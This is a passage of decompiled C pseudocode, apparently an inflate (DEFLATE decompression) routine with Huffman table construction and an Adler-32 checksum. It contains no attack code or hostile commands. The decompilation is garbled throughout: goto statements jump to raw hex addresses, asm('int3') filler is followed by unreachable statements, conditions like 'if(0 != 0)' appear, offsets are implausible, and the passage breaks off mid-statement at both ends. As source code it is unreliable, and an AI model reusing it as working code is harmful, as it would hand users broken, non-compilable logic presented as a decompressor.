																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								_t2473 =  *(_t2870 - 0x84) + 8;
																								 *(_t2870 - 0x84) = _t2473;
																								_t1701 =  *(_t2870 - 0x58) + 8;
																								 *(_t2870 - 0x58) = _t1701;
																							}
																							while(1) {
																								_t2097 =  *(_t2870 - 0x84);
																								if(_t2097 >=  *(_t2870 - 0xa0)) {
																									break;
																								}
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58)) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x58) =  *(_t2870 - 0x58) + 1;
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								_t1701 =  *(_t2870 - 0x84) + 1;
																								 *(_t2870 - 0x84) = _t1701;
																							}
																							goto 0x330d69;
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							 *(_t2870 - 0x20) = _t1701 % _t2097;
																							_t1706 =  *(_t2870 - 0x2c);
																							_t1701 = _t1706 / 0xfff1;
																							 *(_t2870 - 0x2c) = _t1706 % 0xfff1;
																							_t2473 =  *(_t2870 - 0x98) -  *(_t2870 - 0xa0);
																							 *(_t2870 - 0x98) = _t2473;
																							 *(_t2870 - 0xa0) = 0x15b0;
																						}
																						_t1704 = ( *(_t2870 - 0x2c) << 0x10) +  *(_t2870 - 0x20);
																						_t2094 =  *(_t2870 + 8);
																						 *((intOrPtr*)(_t2094 + 0x1c)) = _t1704;
																						if( *(_t2870 - 0x1c) == 0 && ( *(_t2870 + 0x20) & 0x00000001) != 0) {
																							goto 0x330d81;
																							asm("int3");
																							if( *((intOrPtr*)(_t1704 + 0x1c)) !=  *((intOrPtr*)(_t2094 + 0x10))) {
																								 *(_t2870 - 0x1c) = 0xfffffffe;
																							}
																						}
																					}
																					_t1688 =  *(_t2870 - 0x1c);
																					goto L622;
																				} else {
																					goto L502;
																				}
																			} else {
																				_t1789 =  *(_t2870 + 0x20) & 0x00000004;
																				if(_t1789 == 0) {
																					goto L498;
																				} else {
																					L495:
																					 *(_t2870 - 0x1c) = 0xffffffff;
																					_t2086 =  *(_t2870 + 8);
																					 *_t2086 = 0x25;
																				}
																			}
																		} else {
																			L476:
																			_t2233 =  *(_t2870 - 8);
																			if(_t2233 >=  *(_t2870 - 0x24)) {
																				L490:
																				goto 0x330cba;
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				 *(_t2870 - 0x120) = (_t2592 << _t2233) - 0x00000001 &  *(_t2870 - 0xc);
																				 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x24);
																				 *(_t2870 - 8) =  *(_t2870 - 8) -  *(_t2870 - 0x24);
																				_t2592 = 0;
																				if(0 != 0) {
																					goto L476;
																				} else {
																					_t1789 =  *(_t2870 - 0x28) +  *(_t2870 - 0x120);
																					 *(_t2870 - 0x28) = _t1789;
																					goto L493;
																				}
																			} else {
																				L477:
																				_t2465 =  *(_t2870 - 4);
																				if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
																					 *(_t2870 - 0xdc) =  *( *(_t2870 - 4)) & 0x000000ff;
																					 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																					goto L488;
																				} else {
																					L478:
																					_t1692 =  *(_t2870 + 0x20) & 0x00000002;
																					if(_t1692 == 0) {
																						 *(_t2870 - 0xdc) = 0;
																						L486:
																						L488:
																						if(0 != 0) {
																							goto L477;
																						} else {
																							_t2592 =  *(_t2870 - 0xdc) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																							 *(_t2870 - 0xc) = _t2592;
																							 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
																							_t2233 =  *(_t2870 - 8);
																							if(_t2233 <  *(_t2870 - 0x24)) {
																								goto L477;
																							} else {
																								goto L490;
																							}
																						}
																					} else {
																						L479:
																						 *(_t2870 - 0x1c) = 1;
																						_t2086 =  *(_t2870 + 8);
																						 *_t2086 = 0x1b;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t2190 =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
																	if(_t2190 >= 2) {
																		_t1769 = ( *( *(_t2870 - 4) + (1 << 0)) & 0x000000ff) <<  *(_t2870 - 8) + 8;
																		 *(_t2870 - 0xc) = ( *( *(_t2870 - 4) + _t2190 * 0) & 0x000000ff) <<  *(_t2870 - 8) | 0x00000001 |  *(_t2870 - 0xc);
																		 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
																		 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
																		goto L468;
																	} else {
																		L439:
																		_t1769 =  *((short*)( *(_t2870 + 8) + (_t2566 << 0) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
																		 *(_t2870 - 0x44) = _t1769;
																		if( *(_t2870 - 0x44) < 0) {
																			if( *(_t2870 - 8) <= 0xa) {
																				goto L452;
																			} else {
																				 *(_t2870 - 0x4c) = 0xa;
																				do {
																					_t2588 =  *(_t2870 + 8) + (_t1769 << 0) + 0x40;
																					_t1769 =  !( *(_t2870 - 0x44)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x4c) & 0x00000001);
																					 *(_t2870 - 0x44) =  *((short*)(_t2588 + 0x920 + _t1769 * 2));
																					 *(_t2870 - 0x4c) =  *(_t2870 - 0x4c) + 1;
																					if( *(_t2870 - 0x44) < 0) {
																						goto L449;
																					}
																					break;
																					L449:
																					_t1769 =  *(_t2870 - 0x4c) + 1;
																				} while ( *(_t2870 - 8) >= _t1769);
																				if( *(_t2870 - 0x44) < 0) {
																					goto L452;
																				} else {
																					goto L465;
																				}
																			}
																		} else {
																			 *(_t2870 - 0x4c) =  *(_t2870 - 0x44) >> 9;
																			if( *(_t2870 - 0x4c) == 0 ||  *(_t2870 - 8) <  *(_t2870 - 0x4c)) {
																				L452:
																				_t2086 =  *(_t2870 - 4);
																				if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
																					 *(_t2870 - 0xd4) =  *( *(_t2870 - 4)) & 0x000000ff;
																					 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																					goto L463;
																				} else {
																					L453:
																					_t2465 =  *(_t2870 + 0x20) & 0x00000002;
																					if(_t2465 == 0) {
																						 *(_t2870 - 0xd4) = 0;
																						L461:
																						L463:
																						if(0 != 0) {
																							goto L452;
																						} else {
																							_t2566 =  *(_t2870 - 0xd4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																							 *(_t2870 - 0xc) = _t2566;
																							_t1769 =  *(_t2870 - 8) + 8;
																							 *(_t2870 - 8) = _t1769;
																							if( *(_t2870 - 8) < 0xf) {
																								goto L439;
																							} else {
																								goto L465;
																							}
																						}
																					} else {
																						L454:
																						 *(_t2870 - 0x1c) = 1;
																						_t1692 =  *(_t2870 + 8);
																						 *_t1692 = 0x1a;
																					}
																				}
																			} else {
																				L465:
																				goto L468;
																			}
																		}
																	}
																}
															} else {
																L421:
																if( *(_t2870 - 8) >=  *(_t2870 - 0x24)) {
																	L435:
																	goto 0x330c45;
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	 *(_t2870 - 0x124) = (_t2566 << _t2180) - 0x00000001 &  *(_t2870 - 0xc);
																	 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x24);
																	_t2180 =  *(_t2870 - 8) -  *(_t2870 - 0x24);
																	 *(_t2870 - 8) = _t2180;
																	_t2566 = 0;
																	if(0 != 0) {
																		goto L421;
																	} else {
																		_t1769 =  *(_t2870 - 0x10) +  *(_t2870 - 0x124);
																		 *(_t2870 - 0x10) = _t1769;
																		goto L437;
																	}
																} else {
																	L422:
																	_t2086 =  *(_t2870 - 4);
																	if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
																		 *(_t2870 - 0xa4) =  *( *(_t2870 - 4)) & 0x000000ff;
																		 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																		goto L433;
																	} else {
																		L423:
																		_t2465 =  *(_t2870 + 0x20) & 0x00000002;
																		if(_t2465 == 0) {
																			 *(_t2870 - 0xa4) = 0;
																			L431:
																			L433:
																			if(0 != 0) {
																				goto L422;
																			} else {
																				_t2566 =  *(_t2870 - 0xa4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																				 *(_t2870 - 0xc) = _t2566;
																				 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
																				_t2180 =  *(_t2870 - 8);
																				if(_t2180 <  *(_t2870 - 0x24)) {
																					goto L422;
																				} else {
																					goto L435;
																				}
																			}
																		} else {
																			L424:
																			 *(_t2870 - 0x1c) = 1;
																			_t1692 =  *(_t2870 + 8);
																			 *_t1692 = 0x19;
																		}
																	}
																}
															}
														} else {
															L531:
															_t1692 =  *( *(_t2870 + 8) + 0x14) & 0x00000001;
															if(_t1692 == 0) {
																L48:
																if( *(_t2870 - 8) >= 3) {
																	L62:
																	 *( *(_t2870 + 8) + 0x14) =  *(_t2870 - 0xc) & 0x00000007;
																	 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> 3;
																	 *(_t2870 - 8) =  *(_t2870 - 8) - 3;
																	if(0 != 0) {
																		goto L48;
																	} else {
																		 *( *(_t2870 + 8) + 0x18) =  *( *(_t2870 + 8) + 0x14) >> 1;
																		_t1692 =  *(_t2870 + 8);
																		if( *((intOrPtr*)(_t1692 + 0x18)) != 0) {
																			_t2086 =  *(_t2870 + 8);
																			if( *((intOrPtr*)(_t2086 + 0x18)) != 3) {
																				if( *( *(_t2870 + 8) + 0x18) != 1) {
																					 *(_t2870 - 0x10) = 0;
																					L189:
																					if( *(_t2870 - 0x10) >= 3) {
																						goto 0x330a5e;
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						_push( *(_t2870 + 8) + (_t1692 << 1) + 0x40);
																						_t1743 =  *( *0x00DA9D9D)();
																						_t2873 = _t2873 + 0xc;
																						 *(_t2870 - 0x10) = 0;
																						L210:
																						_t2136 =  *(_t2870 + 8);
																						if( *(_t2870 - 0x10) >=  *((intOrPtr*)(_t2136 + (_t1743 << 1) + 0x2c))) {
																							 *((intOrPtr*)( *(_t2870 + 8) + (_t2136 << 1) + 0x2c)) = 0x13;
																							goto L231;
																						} else {
																							L212:
																							if( *(_t2870 - 8) >= 3) {
																								L226:
																								 *(_t2870 - 0x114) =  *(_t2870 - 0xc) & 0x00000007;
																								_t1987 =  *(_t2870 - 0xc) >> 3;
																								 *(_t2870 - 0xc) = _t1987;
																								 *(_t2870 - 8) =  *(_t2870 - 8) - 3;
																								if(0 != 0) {
																									goto L212;
																								} else {
																									_t1743 =  *(_t2870 - 0x114);
																									 *( *(_t2870 + 8) + (_t1987 << 1) + 0x40 + ( *( *(_t2870 - 0x10) + 0x1fba14) & 0x000000ff)) = _t1743;
																									 *(_t2870 - 0x10) =  *(_t2870 - 0x10) + 1;
																									goto L210;
																								}
																							} else {
																								L213:
																								_t1692 =  *(_t2870 - 4);
																								if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
																									 *(_t2870 - 0xc0) =  *( *(_t2870 - 4)) & 0x000000ff;
																									 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																									goto L224;
																								} else {
																									L214:
																									_t2086 =  *(_t2870 + 0x20) & 0x00000002;
																									if(_t2086 == 0) {
																										 *(_t2870 - 0xc0) = 0;
																										L222:
																										L224:
																										if(0 != 0) {
																											goto L213;
																										} else {
																											 *(_t2870 - 0xc) =  *(_t2870 - 0xc0) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																											 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
																											if( *(_t2870 - 8) < 3) {
																												goto L213;
																											} else {
																												goto L226;
																											}
																										}
																									} else {
																										L215:
																										 *(_t2870 - 0x1c) = 1;
																										_t2465 =  *(_t2870 + 8);
																										 *_t2465 = 0xe;
																									}
																								}
																							}
																						}
																					} else {
																						L190:
																						_t428 =  *(_t2870 - 0x10) + 0x1fb010; // 0x7030200
																						if( *(_t2870 - 8) >=  *_t428) {
																							L204:
																							_t456 =  *(_t2870 - 0x10) + 0x1fb010; // 0x7030200
																							 *( *(_t2870 + 8) + 0x2c +  *(_t2870 - 0x10) * 4) = (0x00000001 <<  *_t456) - 0x00000001 &  *(_t2870 - 0xc);
																							_t464 =  *(_t2870 - 0x10) + 0x1fb010; // 0x7030200
																							 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *_t464;
																							_t468 =  *(_t2870 - 0x10) + 0x1fb010; // 0x7030200
																							_t2759 =  *_t468;
																							_t2000 =  *(_t2870 - 8) - _t2759;
																							 *(_t2870 - 8) = _t2000;
																							if(0 != 0) {
																								goto L190;
																							} else {
																								goto 0x330a4a;
																								asm("int3");
																								_t1692 =  *(_t2870 - 0x10);
																								 *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t1692 * 4)) =  *((intOrPtr*)(_t2000 + 0x2c + _t2759 * 4)) +  *((intOrPtr*)(0x1fba28 +  *(_t2870 - 0x10) * 4));
																								 *(_t2870 - 0x10) =  *(_t2870 - 0x10) + 1;
																								goto L189;
																							}
																						} else {
																							L191:
																							_t2465 =  *(_t2870 - 4);
																							if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
																								 *(_t2870 - 0xe0) =  *( *(_t2870 - 4)) & 0x000000ff;
																								 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																								goto L202;
																							} else {
																								L192:
																								_t1692 =  *(_t2870 + 0x20) & 0x00000002;
																								if(_t1692 == 0) {
																									 *(_t2870 - 0xe0) = 0;
																									L200:
																									L202:
																									if(0 != 0) {
																										goto L191;
																									} else {
																										 *(_t2870 - 0xc) =  *(_t2870 - 0xe0) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																										 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
																										_t453 =  *(_t2870 - 0x10) + 0x1fb010; // 0x7030200
																										if( *(_t2870 - 8) <  *_t453) {
																											goto L191;
																										} else {
																											goto L204;
																										}
																									}
																								} else {
																									L193:
																									 *(_t2870 - 0x1c) = 1;
																									_t2086 =  *(_t2870 + 8);
																									 *_t2086 = 0xb;
																								}
																							}
																						}
																					}
																				} else {
																					 *(_t2870 - 0x60) =  *(_t2870 + 8) + 0x40 + _t1692 * 0;
																					 *((intOrPtr*)( *(_t2870 + 8) + 0x2c)) = 0x120;
																					 *( *(_t2870 + 8) + 0xbadbd9) = 0x20;
																					_push(0x20);
																					_push(5);
																					_push( *(_t2870 + 8) + 0xbadbed);
																					_t2086 =  *0x00DA9D9D;
																					 *_t2086();
																					_t2873 = _t2873 + 0xc;
																					 *(_t2870 - 0x5c) = 0;
																					while( *(_t2870 - 0x5c) <= 0x8f) {
																						 *( *(_t2870 - 0x60)) = 8;
																						_t2086 =  *(_t2870 - 0x60) + 1;
																						 *(_t2870 - 0x60) = _t2086;
																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
																					}
																					while( *(_t2870 - 0x5c) <= 0xff) {
																						 *( *(_t2870 - 0x60)) = 9;
																						_t2086 =  *(_t2870 - 0x60) + 1;
																						 *(_t2870 - 0x60) = _t2086;
																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
																					}
																					while( *(_t2870 - 0x5c) <= 0x117) {
																						 *( *(_t2870 - 0x60)) = 7;
																						_t2086 =  *(_t2870 - 0x60) + 1;
																						 *(_t2870 - 0x60) = _t2086;
																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
																					}
																					while( *(_t2870 - 0x5c) <= 0x11f) {
																						 *( *(_t2870 - 0x60)) = 8;
																						_t2086 =  *(_t2870 - 0x60) + 1;
																						 *(_t2870 - 0x60) = _t2086;
																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
																					}
																					L231:
																					L233:
																					if( *( *(_t2870 + 8) + 0x18) < 0) {
																						goto L350;
																					} else {
																						 *((intOrPtr*)(_t2870 - 0x68)) =  *(_t2870 + 8) + 0x40 +  *( *(_t2870 + 8) + 0x18) * 0xda0;
																						_push(0x40);
																						_push(0);
																						_push(_t2870 - 0x1a8);
																						 *( *0x00DA9D9D)();
																						_push(0x800);
																						_push(0);
																						_push( *((intOrPtr*)(_t2870 - 0x68)) + 0x120);
																						 *( *0x00DA9D9D)();
																						_push(0x480);
																						_push(0);
																						_push( *((intOrPtr*)(_t2870 - 0x68)) + 0x920);
																						 *( *0x00DA9D9D)();
																						_t2873 = _t2873 + 0x24;
																						 *(_t2870 - 0x64) = 0;
																						while( *(_t2870 - 0x64) <  *((intOrPtr*)( *(_t2870 + 8) + 0x2c +  *( *(_t2870 + 8) + 0x18) * 4))) {
																							 *((intOrPtr*)(_t2870 + ( *( *((intOrPtr*)(_t2870 - 0x68)) +  *(_t2870 - 0x64)) & 0x000000ff) * 4 - 0x1a8)) =  *((intOrPtr*)(_t2870 + ( *( *((intOrPtr*)(_t2870 - 0x68)) +  *(_t2870 - 0x64)) & 0x000000ff) * 4 - 0x1a8)) + 1;
																							 *(_t2870 - 0x64) =  *(_t2870 - 0x64) + 1;
																						}
																						 *(_t2870 - 0xd8) = 0;
																						 *(_t2870 - 0x9c) = 0;
																						_t1692 = 4 << 0;
																						 *(_t2870 + 0xfffffffffffffe9c) = 0;
																						_t2465 = 0;
																						 *(_t2870 + 0xfffffffffffffe98) = 0;
																						 *(_t2870 - 0x64) = 1;
																						while( *(_t2870 - 0x64) <= 0xf) {
																							 *(_t2870 - 0xd8) =  *(_t2870 - 0xd8) +  *((intOrPtr*)(_t2870 +  *(_t2870 - 0x64) * 4 - 0x1a8));
																							 *(_t2870 - 0x9c) =  *(_t2870 - 0x9c) +  *((intOrPtr*)(_t2870 +  *(_t2870 - 0x64) * 4 - 0x1a8)) << 1;
																							_t2465 =  *(_t2870 - 0x64);
																							 *(_t2870 + _t2465 * 4 - 0x164) =  *(_t2870 - 0x9c);
																							_t1692 =  *(_t2870 - 0x64) + 1;
																							 *(_t2870 - 0x64) = _t1692;
																						}
																						if( *(_t2870 - 0x9c) == 0x10000 ||  *(_t2870 - 0xd8) <= 1) {
																							 *(_t2870 - 0x78) = 0xffffffff;
																							 *(_t2870 - 0x80) = 0;
																							while(1) {
																								_t2666 =  *(_t2870 - 0x80);
																								if(_t2666 >=  *((intOrPtr*)( *(_t2870 + 8) + 0x2c +  *( *(_t2870 + 8) + 0x18) * 4))) {
																									break;
																								}
																								 *(_t2870 - 0x34) = 0;
																								 *(_t2870 - 0x74) =  *( *((intOrPtr*)(_t2870 - 0x68)) +  *(_t2870 - 0x80)) & 0x000000ff;
																								if( *(_t2870 - 0x74) != 0) {
																									 *(_t2870 - 0xe8) =  *(_t2870 +  *(_t2870 - 0x74) * 4 - 0x168);
																									_t2719 =  *(_t2870 +  *(_t2870 - 0x74) * 4 - 0x168) + 1;
																									 *(_t2870 +  *(_t2870 - 0x74) * 4 - 0x168) = _t2719;
																									_t2331 =  *(_t2870 - 0x74);
																									 *(_t2870 - 0xc8) = _t2331;
																									while( *(_t2870 - 0xc8) > 0) {
																										_t2331 =  *(_t2870 - 0x34) << 0x00000001 |  *(_t2870 - 0xe8) & 0x00000001;
																										 *(_t2870 - 0x34) = _t2331;
																										_t2719 =  *(_t2870 - 0xc8) - 1;
																										 *(_t2870 - 0xc8) = _t2719;
																										 *(_t2870 - 0xe8) =  *(_t2870 - 0xe8) >> 1;
																									}
																									if( *(_t2870 - 0x74) > 0xa) {
																										 *(_t2870 - 0x6c) =  *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x120 + ( *(_t2870 - 0x34) & 0x000003ff) * 2));
																										if( *(_t2870 - 0x6c) == 0) {
																											 *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x120 + ( *(_t2870 - 0x34) & 0x000003ff) * 2)) =  *(_t2870 - 0x78);
																											 *(_t2870 - 0x6c) =  *(_t2870 - 0x78);
																											 *(_t2870 - 0x78) =  *(_t2870 - 0x78) - 2;
																										}
																										 *(_t2870 - 0x34) =  *(_t2870 - 0x34) >> 9;
																										 *(_t2870 - 0xd0) =  *(_t2870 - 0x74);
																										while( *(_t2870 - 0xd0) > 0xb) {
																											 *(_t2870 - 0x34) =  *(_t2870 - 0x34) >> 1;
																											 *(_t2870 - 0x6c) =  *(_t2870 - 0x6c) - ( *(_t2870 - 0x34) & 0x00000001);
																											if( *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2)) != 0) {
																												 *(_t2870 - 0x6c) =  *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2));
																											} else {
																												 *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2)) =  *(_t2870 - 0x78);
																												 *(_t2870 - 0x6c) =  *(_t2870 - 0x78);
																												 *(_t2870 - 0x78) =  *(_t2870 - 0x78) - 2;
																											}
																											 *(_t2870 - 0xd0) =  *(_t2870 - 0xd0) - 1;
																										}
																										 *(_t2870 - 0x34) =  *(_t2870 - 0x34) >> 1;
																										 *(_t2870 - 0x6c) =  *(_t2870 - 0x6c) - ( *(_t2870 - 0x34) & 0x00000001);
																										 *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2)) =  *(_t2870 - 0x80);
																									} else {
																										 *((short*)(_t2870 - 0xcc)) =  *(_t2870 - 0x74) << 0x00000009 |  *(_t2870 - 0x80);
																										while( *(_t2870 - 0x34) < 0x400) {
																											goto 0x330ab1;
																											asm("int3");
																											 *((short*)(_t2719 + 0x120 + _t2331 * 2)) =  *((intOrPtr*)(_t2870 - 0xcc));
																											_t2331 =  *(_t2870 - 0x74);
																											_t2719 = (1 << _t2331) +  *(_t2870 - 0x34);
																											 *(_t2870 - 0x34) = 1;
																										}
																									}
																									goto L248;
																								} else {
																									L248:
																									 *(_t2870 - 0x80) =  *(_t2870 - 0x80) + 1;
																									continue;
																								}
																								break;
																							}
																							if( *( *(_t2870 + 8) + 0x18) != 2) {
																								L349:
																								_t2086 =  *( *(_t2870 + 8) + 0x18) - 1;
																								 *( *(_t2870 + 8) + 0x18) = _t2086;
																								goto L233;
																							} else {
																								 *(_t2870 - 0x10) = 0;
																								L274:
																								_t2669 =  *(_t2870 + 8);
																								_t1900 =  *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t2666 * 0)) +  *((intOrPtr*)(_t2669 + 0x30));
																								if( *(_t2870 - 0x10) >= _t1900) {
																									_t2086 = 4 << 0;
																									_t2465 =  *(_t2870 + 8);
																									_t1903 =  *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t2669 * 0)) +  *((intOrPtr*)(_t2465 + 0x30));
																									if(_t1903 ==  *(_t2870 - 0x10)) {
																										_push( *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t1903 * 0)));
																										_push( *(_t2870 + 8) + 0x2924);
																										_push( *(_t2870 + 8) + 0x40);
																										 *((intOrPtr*)( *0x001FC1F0))();
																										_push( *( *(_t2870 + 8) + 0xbadbd9));
																										_push( *(_t2870 + 8) +  *((intOrPtr*)( *(_t2870 + 8) + 0x2c)) + 0x2924);
																										_push( *(_t2870 + 8) + 0xbadbed);
																										 *((intOrPtr*)( *((intOrPtr*)(0x1fc1f0))))();
																										_t2873 = _t2873 + 0x18;
																										goto L349;
																									} else {
																										L344:
																										 *(_t2870 - 0x1c) = 0xffffffff;
																										_t1692 =  *(_t2870 + 8);
																										 *_t1692 = 0x15;
																									}
																								} else {
																									L276:
																									if( *(_t2870 - 8) >= 0xf) {
																										L307:
																										_t2296 =  *((short*)( *(_t2870 + 8) + (_t1900 << 1) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
																										 *(_t2870 - 0x40) = _t2296;
																										if( *(_t2870 - 0x40) < 0) {
																											 *(_t2870 - 0x48) = 0xa;
																											do {
																												 *(_t2870 - 0x40) =  *((short*)( *(_t2870 + 8) + (_t2296 << 1) + 0x40 + 0x920 + ( !( *(_t2870 - 0x40)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x48) & 0x00000001)) * 2));
																												_t2296 =  *(_t2870 - 0x48) + 1;
																												 *(_t2870 - 0x48) = _t2296;
																											} while ( *(_t2870 - 0x40) < 0);
																										} else {
																											 *(_t2870 - 0x48) =  *(_t2870 - 0x40) >> 9;
																											 *(_t2870 - 0x40) =  *(_t2870 - 0x40) & 0x000001ff;
																										}
																										 *(_t2870 - 0x28) =  *(_t2870 - 0x40);
																										_t1900 =  *(_t2870 - 0xc) >>  *(_t2870 - 0x48);
																										 *(_t2870 - 0xc) = _t1900;
																										_t2086 =  *(_t2870 - 8) -  *(_t2870 - 0x48);
																										 *(_t2870 - 8) = _t2086;
																										_t2465 = 0;
																										if(0 != 0) {
																											goto L276;
																										} else {
																											if( *(_t2870 - 0x28) >= 0x10) {
																												if( *(_t2870 - 0x28) != 0x10 ||  *(_t2870 - 0x10) != 0) {
																													_t1937 =  *(_t2870 - 0x28);
																													_t841 = _t1937 + 0x1fb004; // 0x70302
																													_t2315 =  *_t841;
																													 *(_t2870 - 0x24) = _t2315;
																													L322:
																													if( *(_t2870 - 8) >=  *(_t2870 - 0x24)) {
																														L336:
																														goto 0x330b37;
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														 *(_t2870 - 0x8c) = (_t1937 << _t2315) - 0x00000001 &  *(_t2870 - 0xc);
																														 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x24);
																														_t1937 =  *(_t2870 - 8) -  *(_t2870 - 0x24);
																														 *(_t2870 - 8) = _t1937;
																														_t2315 = 0;
																														if(0 != 0) {
																															goto L322;
																														} else {
																															 *(_t2870 - 0x8c) =  *((char*)( *(_t2870 - 0x28) + 0x1fb008)) +  *(_t2870 - 0x8c);
																															if( *(_t2870 - 0x28) != 0x10) {
																																 *(_t2870 - 0x108) = 0;
																															} else {
																																 *(_t2870 - 0x108) =  *( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2923) & 0x000000ff;
																															}
																															_push( *(_t2870 - 0x8c));
																															_push( *(_t2870 - 0x108));
																															_push( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2924);
																															_t2666 = 4 << 0;
																															 *((intOrPtr*)( *0x001FC1F4))();
																															_t2873 = _t2873 + 0xc;
																															 *(_t2870 - 0x10) =  *(_t2870 - 0x10) +  *(_t2870 - 0x8c);
																															goto L274;
																														}
																													} else {
																														L323:
																														_t1692 =  *(_t2870 - 4);
																														if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
																															 *(_t2870 - 0xbc) =  *( *(_t2870 - 4)) & 0x000000ff;
																															 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																															goto L334;
																														} else {
																															L324:
																															_t2086 =  *(_t2870 + 0x20) & 0x00000002;
																															if(_t2086 == 0) {
																																 *(_t2870 - 0xbc) = 0;
																																L332:
																																L334:
																																if(0 != 0) {
																																	goto L323;
																																} else {
																																	_t1937 =  *(_t2870 - 0xbc) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																																	 *(_t2870 - 0xc) = _t1937;
																																	_t2315 =  *(_t2870 - 8) + 8;
																																	 *(_t2870 - 8) = _t2315;
																																	if( *(_t2870 - 8) <  *(_t2870 - 0x24)) {
																																		goto L323;
																																	} else {
																																		goto L336;
																																	}
																																}
																															} else {
																																L325:
																																 *(_t2870 - 0x1c) = 1;
																																_t2465 =  *(_t2870 + 8);
																																 *_t2465 = 0x12;
																															}
																														}
																													}
																												} else {
																													L318:
																													 *(_t2870 - 0x1c) = 0xffffffff;
																													_t1692 =  *(_t2870 + 8);
																													 *_t1692 = 0x11;
																												}
																											} else {
																												 *((char*)( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2924)) =  *(_t2870 - 0x28);
																												_t2666 =  *(_t2870 - 0x10) + 1;
																												 *(_t2870 - 0x10) = _t2666;
																												goto L274;
																											}
																										}
																									} else {
																										if( *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4) >= 2) {
																											_t1900 = ( *( *(_t2870 - 4) + (1 << 0)) & 0x000000ff) <<  *(_t2870 - 8) + 8;
																											 *(_t2870 - 0xc) = ( *( *(_t2870 - 4) + _t2086 * 0) & 0x000000ff) <<  *(_t2870 - 8) | 0x00000001 |  *(_t2870 - 0xc);
																											 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
																											 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
																											goto L307;
																										} else {
																											L278:
																											_t2694 =  *((short*)( *(_t2870 + 8) + (_t2086 << 1) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
																											 *(_t2870 - 0x40) = _t2694;
																											if( *(_t2870 - 0x40) < 0) {
																												if( *(_t2870 - 8) <= 0xa) {
																													goto L291;
																												} else {
																													 *(_t2870 - 0x48) = 0xa;
																													do {
																														_t1900 =  !( *(_t2870 - 0x40)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x48) & 0x00000001);
																														 *(_t2870 - 0x40) =  *((short*)( *(_t2870 + 8) + (_t2694 << 1) + 0x40 + 0x920 + _t1900 * 2));
																														_t2694 =  *(_t2870 - 0x48) + 1;
																														 *(_t2870 - 0x48) = _t2694;
																														if( *(_t2870 - 0x40) < 0) {
																															goto L288;
																														}
																														break;
																														L288:
																														_t1900 =  *(_t2870 - 0x48) + 1;
																													} while ( *(_t2870 - 8) >= _t1900);
																													if( *(_t2870 - 0x40) < 0) {
